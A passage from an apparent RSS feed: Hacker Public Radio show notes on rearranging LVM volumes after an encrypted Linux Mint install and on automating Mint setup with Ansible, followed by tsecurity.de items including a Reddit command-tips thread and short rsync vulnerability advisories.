<p>View your current partition structure:</p>
<pre><code class="lang-bash">lsblk <span class="hljs-_">-f</span>
</code></pre>
<p>This displays your filesystem layout. You should see your encrypted volume group (typically <code>vgmint</code>) with a large root partition consuming most of the space.</p>
<h3>Step 4: Resize Root Partition</h3>
<p>Shrink the root partition from its default size (nearly full disk) to 100GB:</p>
<pre><code class="lang-bash">lvresize -L <span class="hljs-number">100</span>G <span class="hljs-comment">--resizefs vgmint/root</span>
</code></pre>
<p><strong>What this does:</strong></p>
<ul>
<li><code>-L 100G</code> sets the logical volume size to exactly 100GB</li>
<li><code>--resizefs</code> automatically resizes the filesystem to match</li>
<li>This frees up ~900GB for our other partitions</li>
</ul>
<h3>Step 5: Resize Swap Partition</h3>
<p>The default swap is usually small (a few GB). We need to increase it to 32GB for hibernation:</p>
<pre><code class="lang-bash">lvresize <span class="hljs-comment">--verbose -L +32G /dev/mapper/vgmint-swap_1</span>
</code></pre>
<p><strong>What this does:</strong></p>
<ul>
<li><code>-L +32G</code> adds 32GB to the current swap size</li>
<li><code>--verbose</code> shows detailed progress information</li>
<li>This ensures enough swap space for RAM contents during hibernation</li>
</ul>
<p><strong>Note:</strong> For hibernation to work, swap should be at least equal to your RAM size. Adjust accordingly.</p>
<h3>Step 6: Create Home Partition</h3>
<p>Create a new logical volume for your home directory:</p>
<pre><code class="lang-bash">lvcreate -L <span class="hljs-number">700</span>G vgmint -n <span class="hljs-built_in">home</span>
</code></pre>
<p><strong>What this does:</strong></p>
<ul>
<li><code>-L 700G</code> creates a 700GB logical volume</li>
<li><code>vgmint</code> is the volume group name</li>
<li><code>-n home</code> names the new volume "home"</li>
</ul>
<h3>Step 7: Create Backup Partition</h3>
<p>Create a logical volume for Timeshift backups:</p>
<pre><code class="lang-bash">lvcreate -L <span class="hljs-number">100</span>G vgmint -<span class="hljs-built_in">n</span> backup
</code></pre>
<p><strong>What this does:</strong></p>
<ul>
<li>Creates a dedicated 100GB space for system snapshots</li>
<li>Keeps backups separate from user data</li>
<li>Prevents backups from filling up your home partition</li>
</ul>
<h3>Step 8: Format New Partitions</h3>
<p>Format both new partitions with the ext4 filesystem:</p>
<pre><code class="lang-bash">mkfs<span class="hljs-selector-class">.ext4</span> /dev/vgmint/backup
mkfs<span class="hljs-selector-class">.ext4</span> /dev/vgmint/home
</code></pre>
<p><strong>What this does:</strong></p>
<ul>
<li>Creates ext4 filesystems on both logical volumes</li>
<li>ext4 is the standard Linux filesystem with good performance and reliability</li>
</ul>
<h3>Step 9: Mount Partitions</h3>
<p>Create mount points and mount your partitions:</p>
<pre><code class="lang-bash">mkdir <span class="hljs-regexp">/mnt/</span>{root,home}
mount <span class="hljs-regexp">/dev/</span>vgmint<span class="hljs-regexp">/root /m</span>nt<span class="hljs-regexp">/root/</span>
mount <span class="hljs-regexp">/dev/</span>vgmint<span class="hljs-regexp">/home /m</span>nt<span class="hljs-regexp">/home/</span>
</code></pre>
<p><strong>What this does:</strong></p>
<ul>
<li>Creates temporary directories to access the filesystems</li>
<li>Mounts root and home so we can configure them</li>
</ul>
<h3>Step 10: Move Home Directory Contents</h3>
<p>Move the existing home directory contents from the root partition to the new home partition:</p>
<pre><code class="lang-bash">mv <span class="hljs-regexp">/mnt/</span>root<span class="hljs-regexp">/home/</span>* <span class="hljs-regexp">/mnt/</span>home<span class="hljs-regexp">/</span>
</code></pre>
<p><strong>What this does:</strong></p>
<ul>
<li>Transfers all user files and directories from the old location to the new home partition</li>
<li>Preserves your user account settings and any files created during installation</li>
<li>Without this step, your home directory would be empty on first boot</li>
</ul>
<h3>Step 11: Update fstab</h3>
<p>Add the home partition to the system's fstab file so it mounts automatically at boot:</p>
<pre><code class="lang-bash">echo <span class="hljs-string">"/dev/mapper/vgmint-home /home           ext4    defaults        0 2"</span> &gt;&gt; <span class="hljs-regexp">/mnt/</span>root<span class="hljs-regexp">/etc/</span>fstab
</code></pre>
<p><strong>What this does:</strong></p>
<ul>
<li>Appends a mount entry to <code>/etc/fstab</code></li>
<li>Ensures <code>/home</code> partition mounts automatically at startup</li>
<li>The <code>0 2</code> values enable filesystem checks during boot</li>
</ul>
<h3>Step 12: Clean Up and Prepare for Reboot</h3>
<p>Unmount the partitions and deactivate the volume group:</p>
<pre><code class="lang-bash">umount <span class="hljs-regexp">/mnt/</span>root
umount <span class="hljs-regexp">/mnt/</span>home
swapoff -a
lvchange -an vgmint
</code></pre>
<p><strong>What this does:</strong></p>
<ul>
<li>Safely unmounts all mounted filesystems</li>
<li>Turns off swap</li>
<li>Deactivates the volume group to prevent conflicts</li>
<li>Ensures everything is properly closed before reboot</li>
</ul>
<h3>Step 13: Reboot</h3>
<p>Now you can safely reboot into your new system:</p>
<pre><code class="lang-bash"><span class="hljs-attribute">reboot</span>
</code></pre>
<p>Enter your LUKS encryption password at boot, then log in normally.</p>
<h2>Verification</h2>
<p>After rebooting, verify your partition setup:</p>
<pre><code class="lang-bash">lsblk -<span class="hljs-built_in">f</span>
df -<span class="hljs-built_in">h</span>
</code></pre>
<p>You should see:</p>
<ul>
<li>Root (<code>/</code>) mounted with ~100GB</li>
<li>Home (<code>/home</code>) mounted with ~700GB</li>
<li>Swap available with 32GB</li>
<li>Backup partition ready for Timeshift configuration</li>
</ul>
<h2>Setting Up Timeshift</h2>
<p>To complete your backup solution:</p>
<ol>
<li>Install Timeshift (if not already installed): <code>sudo apt install timeshift</code></li>
<li>Launch Timeshift and select RSYNC mode</li>
<li>Choose the backup partition as your snapshot location</li>
<li>Configure your backup schedule (daily, weekly, monthly)</li>
<li>Create your first snapshot</li>
</ol>
<h2>Additional Resources</h2>
<ul>
<li><a href="https://www.dwarmstrong.org/rearrange-lvm-after-mint-install/">Original blog post on LVM rearrangement</a></li>
<li><a href="https://hackerpublicradio.org/eps/hpr4524/setting-up-hibernation-linux-mint.md">Setting up hibernation on Linux Mint</a></li>
</ul>
<h2>Conclusion</h2>
<p>This setup gives you the best of both worlds: the security of full-disk encryption with LUKS, and the flexibility of custom LVM partitions. Your home directory and system backups are now isolated, making system recovery and upgrades much safer and more manageable.</p>

<hr>


<p>
<br>
</p>
<p>
<a href="https://code.christman.uk/Linux/auto-setup-linuxmint-after-fresh-install" rel="noopener noreferrer" target="_blank">
Automating Your Linux Mint Setup After a Fresh Install</a>
</p>

<h1>Automating Your Linux Mint Setup After a Fresh Install</h1>
<p>Setting up a fresh Linux Mint installation can be time-consuming, especially when you want to replicate your perfect development environment. This guide will show you how to automate the entire process using Ansible and configuration backups, so you can go from a fresh install to a fully configured system in minutes.</p>
<h2>Why Automate Your Setup?</h2>
<p>Whether you're setting up a new machine, recovering from a system failure, or just want to maintain consistency across multiple computers, automation offers several key benefits:</p>
<ul>
<li><strong>Time Savings:</strong> What normally takes hours can be done in minutes</li>
<li><strong>Consistency:</strong> Identical setup across all your machines</li>
<li><strong>Documentation:</strong> Your setup becomes self-documenting</li>
<li><strong>Recovery:</strong> Quick recovery from system failures</li>
<li><strong>Reproducibility:</strong> Never forget to install that one crucial tool again</li>
</ul>
<h2>Discovering Your Installed Applications</h2>
<p>Before creating your automation setup, you need to identify which applications you've manually installed since the initial OS installation. This helps you build a complete picture of your custom environment.</p>
<h3>Finding APT and .deb Packages</h3>
<p>To see all manually installed packages (excluding those that came with the OS):</p>
<pre><code class="lang-bash">comm -<span class="hljs-number">23</span> &lt;(apt-mark showmanual | <span class="hljs-keyword">sort</span> -u) &lt;(gzip -dc <span class="hljs-regexp">/var/</span>log<span class="hljs-regexp">/installer/i</span>nitial-status.gz | sed -n <span class="hljs-string">'s/^Package: //p'</span> | <span class="hljs-keyword">sort</span> -u)
</code></pre>
<p><strong>What this does:</strong></p>
<ul>
<li><code>apt-mark showmanual</code> lists all manually installed packages</li>
<li><code>/var/log/installer/initial-status.gz</code> contains packages from the initial installation</li>
<li><code>comm -23</code> compares the two lists and shows only packages you installed after setup</li>
<li>This helps you identify exactly what to include in your Ansible playbook</li>
</ul>
<p><strong>Tip:</strong> Save this output to a file for reference:</p>
<pre><code class="lang-bash">comm -<span class="hljs-number">23</span> &lt;(apt-mark showmanual | <span class="hljs-keyword">sort</span> -u) &lt;(gzip -dc <span class="hljs-regexp">/var/</span>log<span class="hljs-regexp">/installer/i</span>nitial-status.gz | sed -n <span class="hljs-string">'s/^Package: //p'</span> | <span class="hljs-keyword">sort</span> -u) &gt; manually-installed-packages.txt
</code></pre>
<h3>Finding Flatpak Applications</h3>
<p>To list all installed Flatpak applications:</p>
<pre><code class="lang-bash">flatpak <span class="hljs-built_in">list</span> <span class="hljs-comment">--app</span>
</code></pre>
<p><strong>What this does:</strong></p>
<ul>
<li>Lists all Flatpak applications installed on your system</li>
<li>The <code>--app</code> flag filters out runtimes and shows only applications</li>
<li>Use this list to populate the Flatpak section of your Ansible playbook</li>
</ul>
<p><strong>Getting more details:</strong></p>
<pre><code class="lang-bash"><span class="hljs-comment"># Show application IDs (needed for Ansible)</span>
flatpak <span class="hljs-built_in">list</span> <span class="hljs-comment">--app --columns=application</span>

<span class="hljs-comment"># Show with origin (where it was installed from)</span>
flatpak <span class="hljs-built_in">list</span> <span class="hljs-comment">--app --columns=application,origin</span>
</code></pre>
<h3>Creating Your Package Inventory</h3>
<p>Use these commands to build a comprehensive inventory:</p>
<pre><code class="lang-bash"># Create a directory <span class="hljs-keyword">for</span> your automation files
<span class="hljs-keyword">mkdir</span> -p ~/linux-mint-automation

# <span class="hljs-keyword">Save</span> APT packages
comm -23 &lt;(apt-<span class="hljs-keyword">mark</span> showmanual | <span class="hljs-keyword">sort</span> -<span class="hljs-keyword">u</span>) &lt;(gzip -dc /<span class="hljs-keyword">var</span>/<span class="hljs-keyword">log</span>/installer/initial-status.gz | sed -<span class="hljs-keyword">n</span> 's/^Package: <span class="hljs-comment">//p' | sort -u) &gt; ~/linux-mint-automation/apt-packages.txt</span>

# <span class="hljs-keyword">Save</span> Flatpak apps
flatpak <span class="hljs-keyword">list</span> --<span class="hljs-keyword">app</span> --columns=application &gt; ~/linux-mint-automation/flatpak-apps.txt
</code></pre>
<p>Now you have a clear reference of what needs to be included in your automation setup!</p>
<h2>Overview of the Automation Strategy</h2>
<p>This guide uses a three-part approach:</p>
<ol>
<li><strong>Ansible Playbook</strong> - Automates software installation and system configuration</li>
<li><strong>Configuration Files</strong> - Backs up and restores application settings from <code>.config</code></li>
<li><strong>dconf Backup</strong> - Preserves desktop environment settings (Cinnamon/GNOME)</li>
</ol>
<p>I store all configurations in a private repository to protect any sensitive information while keeping everything version-controlled and easily accessible.</p>
<h2>Prerequisites</h2>
<p>Before you begin, make sure you have:</p>
<ul>
<li>A fresh Linux Mint installation</li>
<li>Terminal access</li>
<li>An internet connection</li>
<li>Basic familiarity with the command line</li>
</ul>
<h2>Step-by-Step Setup Process</h2>
<h3>Step 1: Update Your System</h3>
<p>First things first—let's make sure your system is up to date:</p>
<pre><code class="lang-bash">sudo apt <span class="hljs-keyword">update</span>
sudo apt <span class="hljs-keyword">upgrade</span> -y
</code></pre>
<p><strong>What this does:</strong></p>
<ul>
<li>Updates the package index to get the latest package information</li>
<li>Upgrades all installed packages to their latest versions</li>
<li>The <code>-y</code> flag automatically confirms all prompts</li>
</ul>
<h3>Step 2: Install Ansible</h3>
<p>Ansible is a powerful automation tool that will handle the bulk of our software installation. Add the official Ansible PPA and install it:</p>
<pre><code class="lang-bash">sudo apt-<span class="hljs-built_in">add</span>-repository <span class="hljs-keyword">pp</span><span class="hljs-variable">a:ansible</span>/ansible
sudo apt <span class="hljs-keyword">update</span>
sudo apt install ansible
</code></pre>
<p><strong>What this does:</strong></p>
<ul>
<li>Adds the official Ansible Personal Package Archive (PPA)</li>
<li>Refreshes package information to include Ansible packages</li>
<li>Installs the latest version of Ansible</li>
</ul>
<h3>Step 3: Create Your Ansible Playbook</h3>
<p>Create an Ansible playbook that defines your entire system configuration. This YAML file will automate software installation from multiple sources.</p>
<p>Create a file named <code>localsetup.yml</code>:</p>
<pre><code class="lang-yaml">-<span class="ruby"> <span class="hljs-symbol">hosts:</span> localhost
</span>  become: true

  vars:
    # Add any variables here (URLs, versions, etc.)

  tasks:
    # Install prerequisites
    -<span class="ruby"> <span class="hljs-symbol">name:</span> Install prerequisites <span class="hljs-keyword">for</span> Ansible to install .deb via apt <span class="hljs-class"><span class="hljs-keyword">module</span></span>
</span>      apt:
        name:
          -<span class="ruby"> xz-utils
</span>        state: present

    -<span class="ruby"> <span class="hljs-symbol">name:</span> Ensure wget <span class="hljs-keyword">and</span> gpg are installed
</span>      apt:
        name:
          -<span class="ruby"> wget
</span>          -<span class="ruby"> gpg
</span>        state: present

    # Install applications from .deb packages
    -<span class="ruby"> <span class="hljs-symbol">name:</span> Install Google Chrome
</span>      apt:
        deb: https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb

    # Add third-party repositories
    -<span class="ruby"> <span class="hljs-symbol">name:</span> Add signing key <span class="hljs-keyword">for</span> Tailscale
</span>      get_url:
        url: https://pkgs.tailscale.com/stable/ubuntu/jammy.noarmor.gpg
        dest: /usr/share/keyrings/tailscale.gpg
        mode: '0644'

    -<span class="ruby"> <span class="hljs-symbol">name:</span> Add Tailscale repository
</span>      apt_repository:
        repo: "deb [signed-by=/usr/share/keyrings/tailscale.gpg] https://pkgs.tailscale.com/stable/ubuntu jammy main"
        filename: tailscale
        state: present

    -<span class="ruby"> <span class="hljs-symbol">name:</span> Update package cache after adding repositories
</span>      ansible.builtin.apt:
        update_cache: yes

    # Install standard packages from Ubuntu/Mint repositories
    -<span class="ruby"> <span class="hljs-symbol">name:</span> Install essential applications
</span>      apt:
        pkg:
          -<span class="ruby"> tailscale
</span>          -<span class="ruby"> git
</span>          -<span class="ruby"> diodon          <span class="hljs-comment"># Clipboard manager</span>
</span>          -<span class="ruby"> pavucontrol     <span class="hljs-comment"># PulseAudio volume control</span>
</span>          -<span class="ruby"> guake           <span class="hljs-comment"># Drop-down terminal</span>
</span>          -<span class="ruby"> vim
</span>          -<span class="ruby"> curl
</span>          -<span class="ruby"> htop
</span>        state: present

    # Install Flatpak applications
    -<span class="ruby"> <span class="hljs-symbol">name:</span> Install Flatpak applications
</span>      community.general.flatpak:
        name:
          -<span class="ruby"> org.gimp.GIMP
</span>          -<span class="ruby"> org.inkscape.Inkscape
</span>        state: present
</code></pre>
<p><strong>Understanding the playbook structure:</strong></p>
<ul>
<li><strong>hosts: localhost</strong> - Runs on your local machine</li>
<li><strong>become: true</strong> - Executes tasks with sudo privileges</li>
<li><strong>tasks</strong> - List of operations to perform</li>
<li><strong>apt module</strong> - Installs packages from repositories or .deb files</li>
<li><strong>apt_repository</strong> - Adds third-party repositories</li>
<li><strong>flatpak module</strong> - Installs Flatpak applications</li>
</ul>
<p><strong>Customization tips:</strong></p>
<ul>
<li>Add more packages to the <code>pkg</code> list under "Install essential applications"</li>
<li>Include additional <code>.deb</code> packages using the <code>deb:</code> parameter</li>
<li>Add more third-party repositories following the Tailscale example</li>
<li>Extend with Flatpak apps, snap packages, or pip packages as needed</li>
</ul>
<h3>Step 4: Run the Ansible Playbook</h3>
<p>Navigate to the directory containing your <code>localsetup.yml</code> file and execute the playbook:</p>
<pre><code class="lang-bash">sudo ansible-playbook localsetup<span class="hljs-selector-class">.yml</span> --connection=local
</code></pre>
<p><strong>What this does:</strong></p>
<ul>
<li>Executes all tasks defined in your playbook</li>
<li>Installs all specified software automatically</li>
<li>Configures repositories and signing keys</li>
<li>Runs with local connection (no SSH required)</li>
</ul>
<p><strong>Note:</strong> This may take several minutes to complete, depending on your internet connection and the number of packages being installed. You'll see progress output for each task.</p>
<h3>Step 5: Restore Configuration Files</h3>
<p>Application settings are typically stored in the <code>~/.config</code> directory. If you have a backup of your configuration files, restore them:</p>
<pre><code class="lang-bash"><span class="hljs-comment"># Clone your private configuration repository</span>
git clone https:<span class="hljs-regexp">//gi</span>thub.com<span class="hljs-regexp">/yourusername/y</span>our-config-repo.git
cd your-config-repo

<span class="hljs-comment"># Copy configuration files to your home directory</span>
cp -r .config<span class="hljs-regexp">/* ~/</span>.config<span class="hljs-regexp">/</span>
</code></pre>
<p><strong>What this restores:</strong></p>
<ul>
<li>Application preferences and settings</li>
<li>Custom keyboard shortcuts</li>
<li>Editor configurations (VS Code, Vim, etc.)</li>
<li>Terminal emulator settings</li>
<li>Any other application-specific configurations</li>
</ul>
<p><strong>Tip:</strong> Press <code>Ctrl + H</code> in your file manager to show hidden files and folders (those starting with <code>.</code>).</p>
<p><strong>Important configurations to backup:</strong></p>
<ul>
<li><code>~/.config/</code> - Most modern application settings</li>
<li><code>~/.bashrc</code> or <code>~/.zshrc</code> - Shell configuration</li>
<li><code>~/.gitconfig</code> - Git configuration</li>
</ul>
<h3>Step 6: Import Desktop Environment Settings</h3>
<p>Restore your Cinnamon/GNOME desktop environment settings using dconf. This includes themes, panels, applets, and all desktop preferences.</p>
<h4>Creating a dconf Backup (do this on your working system first):</h4>
<pre><code class="lang-bash"><span class="hljs-comment"># Export all settings</span>
dconf <span class="hljs-keyword">dump</span> / &gt; my_dconf_backup.conf

<span class="hljs-comment"># Or export specific paths</span>
dconf <span class="hljs-keyword">dump</span> /org/cinnamon/ &gt; cinnamon_settings.conf
</code></pre>
<h4>Restoring dconf Settings:</h4>
<pre><code class="lang-bash"><span class="hljs-comment"># Navigate to your dconf backup location</span>
cd /path/<span class="hljs-built_in">to</span>/your/backups/dconf

<span class="hljs-comment"># Restore all settings</span>
dconf <span class="hljs-built_in">load</span> / &lt; my_dconf_backup.conf
</code></pre>
<p><strong>What this restores:</strong></p>
<ul>
<li>Desktop themes and appearance</li>
<li>Panel configuration and applets</li>
<li>Keyboard shortcuts</li>
<li>Window manager preferences</li>
<li>Display settings</li>
<li>Power management settings</li>
<li>All other desktop environment preferences</li>
</ul>
<p><strong>Note:</strong> You may need to log out and log back in for all changes to take effect.</p>
<h2>Advanced Tips and Best Practices</h2>
<h3>Maintaining Your Automation Setup</h3>
<ol>
<li><strong>Version Control:</strong> Keep your playbook and configs in a Git repository</li>
<li><strong>Regular Updates:</strong> Update your backup after making configuration changes</li>
<li><strong>Test on VMs:</strong> Test your automation on a virtual machine before using on production</li>
<li><strong>Document Changes:</strong> Add comments to your playbook explaining custom configurations</li>
</ol>
<h3>Securing Sensitive Information</h3>
<ul>
<li>Use Ansible Vault to encrypt sensitive data in your playbooks</li>
<li>Never commit SSH private keys or passwords to repositories</li>
<li>Use environment variables for sensitive configuration values</li>
<li>Keep your configuration repository private</li>
</ul>
<h3>Extending Your Automation</h3>
<p>You can extend this setup to include:</p>
<pre><code class="lang-yaml"># Install development tools
-<span class="ruby"> <span class="hljs-symbol">name:</span> Install development tools
</span>  apt:
    pkg:
      -<span class="ruby"> build-essential
</span>      -<span class="ruby"> docker.io
</span>      -<span class="ruby"> python3-pip
</span>      -<span class="ruby"> nodejs
</span>      -<span class="ruby"> npm
</span>
# Install VS Code
-<span class="ruby"> <span class="hljs-symbol">name:</span> Add VS Code repository key
</span>  apt_key:
    url: "https://packages.microsoft.com/keys/microsoft.asc"
    state: present

-<span class="ruby"> <span class="hljs-symbol">name:</span> Add VS Code repository
</span>  apt_repository:
    repo: "deb [arch=amd64] https://packages.microsoft.com/repos/vscode stable main"
    filename: vscode
    state: present

-<span class="ruby"> <span class="hljs-symbol">name:</span> Install VS Code
</span>  apt:
    name: code
    state: present

# Configure git
-<span class="ruby"> <span class="hljs-symbol">name:</span> Configure git user
</span>  community.general.git_config:
    name: "{{ item.name }}"
    value: "{{ item.value }}"
    scope: global
  loop:
    -<span class="ruby"> { <span class="hljs-symbol">name:</span> <span class="hljs-string">'user.name'</span>, <span class="hljs-symbol">value:</span> <span class="hljs-string">'Your Name'</span> }
</span>    -<span class="ruby"> { <span class="hljs-symbol">name:</span> <span class="hljs-string">'user.email'</span>, <span class="hljs-symbol">value:</span> <span class="hljs-string">'your.email@example.com'</span> }</span>
</code></pre>
<h2>Troubleshooting</h2>
<h3>Common Issues</h3>
<p><strong>Ansible not found after installation:</strong></p>
<pre><code class="lang-bash"># <span class="hljs-built_in">Verify</span> installation
ansible --version

# <span class="hljs-keyword">If</span> <span class="hljs-keyword">not</span> found, check <span class="hljs-built_in">PATH</span>
<span class="hljs-built_in">echo</span> $<span class="hljs-built_in">PATH</span>
</code></pre>
<p><strong>Permission denied errors:</strong></p>
<ul>
<li>Ensure you're running the playbook with <code>sudo</code></li>
<li>Check file permissions on your playbook: <code>chmod 644 localsetup.yml</code></li>
</ul>
<p><strong>Package conflicts:</strong></p>
<ul>
<li>Run <code>sudo apt update</code> before running the playbook</li>
<li>Check for PPA conflicts: <code>sudo apt-cache policy &lt;package-name&gt;</code></li>
</ul>
<p><strong>dconf restore doesn't seem to work:</strong></p>
<ul>
<li>Log out and log back in after restoring</li>
<li>Verify the backup file format: <code>head my_dconf_backup.conf</code></li>
<li>Try restoring specific paths instead of all settings</li>
</ul>
<h2>Conclusion</h2>
<p>Automating your Linux Mint setup transforms a tedious manual process into a quick, repeatable procedure. With Ansible handling software installation, configuration file backups preserving application settings, and dconf managing desktop preferences, you can rebuild your perfect development environment in minutes rather than hours.</p>
<p>The time invested in creating these automation scripts pays dividends every time you set up a new machine, recover from a failure, or help a colleague replicate your environment.</p>
<h2>Additional Resources</h2>
<ul>
<li><a href="https://docs.ansible.com/">Ansible Documentation</a></li>
<li><a href="https://wiki.gnome.org/Projects/dconf">dconf Manual</a></li>
<li><a href="https://linuxmint.com/documentation.php">Linux Mint Documentation</a></li>
<li><a href="https://dotfiles.github.io/">Dotfiles Management</a></li>
</ul>
<h2>Next Steps</h2>
<ul>
<li>Customize the playbook with your preferred applications</li>
<li>Create backups of your current configuration files</li>
<li>Export your current dconf settings</li>
<li>Test your automation on a virtual machine</li>
<li>Set up a private Git repository for your configurations</li>
</ul>




<p><a href="https://hackerpublicradio.org/eps/hpr4524/index.html#comments">Provide <strong>feedback</strong> on this episode</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[what's a simple command or script that felt like a magic trick once you learned it?]]></title>
<description><![CDATA[We all have that moment where you discover a command or a one-liner that saves you from a ton of manual work and you wonder how you ever lived without it. For me, it was learning about rsync -avP for large transfers. Going from a blind cp that could silently fail for hours to seeing the progress ...]]></description>
<link>https://tsecurity.de/de/3114712/linux-tipps/whats-a-simple-command-or-script-that-felt-like-a-magic-trick-once-you-learned-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3114712/linux-tipps/whats-a-simple-command-or-script-that-felt-like-a-magic-trick-once-you-learned-it/</guid>
<pubDate>Sun, 23 Nov 2025 02:49:36 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>We all have that moment where you discover a command or a one-liner that saves you from a ton of manual work and you wonder how you ever lived without it.</p> <p>For me, it was learning about <code>rsync -avP</code> for large transfers. Going from a blind <code>cp</code> that could silently fail for hours to seeing the progress and file list in real-time was a game-changer.</p> <p>A close second is <code>cd -</code> to jump back to the previous directory.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/boiler_room_420"> /u/boiler_room_420 </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1p3ry8g/whats_a_simple_command_or_script_that_felt_like_a/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1p3ry8g/whats_a_simple_command_or_script_that_felt_like_a/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[IT-Sicherheit: Linux und UNIX gefährdet - IT-Sicherheitslücke bei Rsync mit hohem Risiko ...]]></title>
<description><![CDATA[... Server, Oracle Linux, Gentoo Linux, Open Source Arch Linux, RESF Rocky Linux, Dell NetWorker, Dell Avamar, Open Source Rsync, HAProxy HAProxy und ...]]></description>
<link>https://tsecurity.de/de/3112622/unix-server/it-sicherheit-linux-und-unix-gefaehrdet-it-sicherheitsluecke-bei-rsync-mit-hohem-risiko/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3112622/unix-server/it-sicherheit-linux-und-unix-gefaehrdet-it-sicherheitsluecke-bei-rsync-mit-hohem-risiko/</guid>
<pubDate>Fri, 21 Nov 2025 17:07:21 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[... <b>Server</b>, Oracle Linux, Gentoo Linux, Open Source Arch Linux, RESF Rocky Linux, Dell NetWorker, Dell Avamar, Open Source Rsync, HAProxy HAProxy und ...]]></content:encoded>
</item>
<item>
<title><![CDATA[[UPDATE] [hoch] Rsync: Mehrere Schwachstellen]]></title>
<description><![CDATA[Ein Angreifer kann mehrere Schwachstellen in Rsync ausnutzen, um vertrauliche Informationen preiszugeben, sich erhöhte Rechte zu verschaffen und Daten zu manipulieren.]]></description>
<link>https://tsecurity.de/de/3111584/it-security-nachrichten/update-hoch-rsync-mehrere-schwachstellen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3111584/it-security-nachrichten/update-hoch-rsync-mehrere-schwachstellen/</guid>
<pubDate>Fri, 21 Nov 2025 09:34:56 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein Angreifer kann mehrere Schwachstellen in Rsync ausnutzen, um vertrauliche Informationen preiszugeben, sich erhöhte Rechte zu verschaffen und Daten zu manipulieren.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-10158 | rsync up to 3.4.1 File Transfer array index (Nessus ID 275743)]]></title>
<description><![CDATA[A vulnerability labeled as problematic has been found in rsync up to 3.4.1. The impacted element is an unknown function of the component File Transfer. The manipulation results in improper validation of array index.

This vulnerability is known as CVE-2025-10158. It is possible to launch the atta...]]></description>
<link>https://tsecurity.de/de/3107168/sicherheitsluecken/cve-2025-10158-rsync-up-to-341-file-transfer-array-index-nessus-id-275743/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3107168/sicherheitsluecken/cve-2025-10158-rsync-up-to-341-file-transfer-array-index-nessus-id-275743/</guid>
<pubDate>Wed, 19 Nov 2025 12:38:05 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/?kb.risk">problematic</a> has been found in <a href="https://vuldb.com/?product.rsync">rsync up to 3.4.1</a>. The impacted element is an unknown function of the component <em>File Transfer</em>. The manipulation results in improper validation of array index.

This vulnerability is known as <a href="https://vuldb.com/?source_cve.332791">CVE-2025-10158</a>. It is possible to launch the attack remotely. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[[NEU] [UNGEPATCHT] [mittel] Rsync: Schwachstelle ermöglicht nicht spezifizierten Angriff]]></title>
<description><![CDATA[Ein entfernter, authentisierter Angreifer kann eine Schwachstelle in Rsync ausnutzen, um einen nicht näher spezifizierten Angriff durchzuführen.]]></description>
<link>https://tsecurity.de/de/3107142/it-security-nachrichten/neu-ungepatcht-mittel-rsync-schwachstelle-ermoeglicht-nicht-spezifizierten-angriff/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3107142/it-security-nachrichten/neu-ungepatcht-mittel-rsync-schwachstelle-ermoeglicht-nicht-spezifizierten-angriff/</guid>
<pubDate>Wed, 19 Nov 2025 12:34:36 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein entfernter, authentisierter Angreifer kann eine Schwachstelle in Rsync ausnutzen, um einen nicht näher spezifizierten Angriff durchzuführen.]]></content:encoded>
</item>
<item>
<title><![CDATA[cwRsync bringt Rsync auf Windows – schnelle Synchronisation ohne Umwege]]></title>
<description><![CDATA[Storage-Security · Allgemein · Datenrettung · Business ... Cyber-Resilienz bedeutet mehr als IT-Sicherheit: Unternehmen müssen Angriffe überstehen, den.]]></description>
<link>https://tsecurity.de/de/3086818/it-security-nachrichten/cwrsync-bringt-rsync-auf-windows-schnelle-synchronisation-ohne-umwege/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3086818/it-security-nachrichten/cwrsync-bringt-rsync-auf-windows-schnelle-synchronisation-ohne-umwege/</guid>
<pubDate>Sat, 08 Nov 2025 09:48:46 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Storage-Security · Allgemein · Datenrettung · Business ... Cyber-Resilienz bedeutet mehr als <b>IT</b>-<b>Sicherheit</b>: Unternehmen müssen Angriffe überstehen, den.]]></content:encoded>
</item>
<item>
<title><![CDATA[Alt, unsicher, ineffizient: Welche Linux-Befehle Sie heute besser meiden sollten]]></title>
<description><![CDATA[Linux entwickelt sich laufend weiter und damit auch die Werkzeuge, die seine Fans tagtäglich nutzen. Manche der Klassiker wie das durch nftables ersetzte iptables sind inzwischen aber nicht nur überholt, sondern auch potenziell unsicher oder ineffizient. 



Dabei sind sie noch in vielen Linux-Bü...]]></description>
<link>https://tsecurity.de/de/3075201/windows-tipps/alt-unsicher-ineffizient-welche-linux-befehle-sie-heute-besser-meiden-sollten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3075201/windows-tipps/alt-unsicher-ineffizient-welche-linux-befehle-sie-heute-besser-meiden-sollten/</guid>
<pubDate>Sun, 02 Nov 2025 08:37:10 +0100</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



